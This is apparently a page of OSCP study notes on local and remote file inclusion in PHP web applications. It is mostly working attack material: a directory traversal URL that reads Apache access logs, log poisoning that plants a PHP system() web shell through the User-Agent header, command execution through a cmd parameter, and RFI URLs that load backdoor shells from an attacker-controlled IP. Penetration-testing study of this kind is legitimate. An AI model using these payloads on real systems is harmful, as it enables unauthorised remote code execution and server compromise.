// notes/ Web Exploitation
🕸️

LFI And RFI

Directory traversal is used to read the contents of a file outside of the web server’s web root. File inclusion vulnerabilities allow us to include a file in the application’s run…

#web applications#adot8
source · oscp.adot8.com · web-applications/lfi-and-rfi

LFI & RFI

Local File Inclusion

Directory traversal is used to read the contents of a file outside of the web server’s web root. File inclusion vulnerabilities allow us to include a file in the application’s running code allowing use to execute local or remote files

Log Injection

Display contents of a log file (if dir traversal is present)

code
01http://adot.com/app/index.php?page=../../../../../var/log/apache2/access.log

It should have something like the following

code
0110.10.14.1 - - [19/Jun/2024:12:11:34 +0000] "GET /app/index.php?page=admin.php
02HTTP/1.1" 200 2218 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
03Firefox/91.0"

We can then edit the User-Agent to the following in Burp for RCE

php
01<?php echo system($_GET['cmd']); ?>

Now when we request the access log and add our command with the cmd parameter it will execute

code
01http://adot.com/app/index.php?page=../../../../../var/log/apache2/access.log&cmd=whoami

{% hint style="info" %} Windows apache logs located at C:\xampp\apache\logs\ {% endhint %}

Remote File Inclusion

Same concept as LFI except with remote files that can be accessed over HTTP or SMB. The allow_url_include options needs to be enabled within the PHP application to leverage this.

code
01/usr/share/webshells/php/simple-backdoor.php
code
01http://adot.com/app/index.php?page=http://10.10.14.10/simple-backdoor.php&cmd=whoami
02http://adot.com/app/index.php?page=http://10.10.14.10/shell.php